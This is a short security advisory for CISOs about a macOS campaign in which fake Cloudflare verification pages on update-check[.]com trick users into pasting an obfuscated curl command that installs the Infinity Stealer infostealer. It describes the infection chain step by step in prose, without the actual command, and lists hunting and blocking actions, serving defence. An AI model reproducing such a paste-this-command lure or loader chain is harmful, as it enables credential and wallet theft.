What happened
Infinity Stealer grabs macOS data via ClickFix lures in a campaign that uses fake human verification pages to trick users into executing malicious code in Terminal. According to Malwarebytes, the attack begins on the domain update-check[.]com, which displays a fake Cloudflare verification prompt and instructs the user to paste a base64-obfuscated curl command into macOS Terminal. That command decodes a Bash script, writes a second-stage Nuitka loader to /tmp, removes the quarantine flag, executes it with nohup, passes command-and-control information through environment variables, and then deletes itself and closes Terminal. The final payload is Infinity Stealer, a Python-based infostealer compiled into a native macOS binary. Malwarebytes said it can take screenshots and steal browser credentials, macOS Keychain entries, cryptocurrency wallet data, and plaintext secrets in developer files such as .env.
Who is affected
The direct exposure affects macOS users who encounter the fake Cloudflare verification page and paste the supplied command into Terminal. The potential impact includes theft of credentials from Chromium-based browsers and Firefox, macOS Keychain data, cryptocurrency wallets, screenshots, and plaintext developer secrets.
Why CISOs should care
This matters because the reported attack uses user-driven execution to bypass OS-level defenses and then steals multiple categories of high-value data from macOS systems. It is also notable because Malwarebytes described it as the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
3 practical actions
Block the delivery path: Block access to update-check[.]com and investigate whether users were exposed to fake Cloudflare verification pages tied to this campaign.
Hunt for the execution chain: Review macOS systems for Terminal-driven execution of obfuscated curl commands, Bash scripts writing payloads to /tmp, quarantine flag removal, and nohup-launched binaries.
Scope for the named data types: Treat affected hosts as potentially exposed for browser credentials, macOS Keychain entries, cryptocurrency wallets, screenshots, and plaintext secrets in files such as .env.
For more news about macOS infostealers and malicious delivery campaigns, click Malware to read more.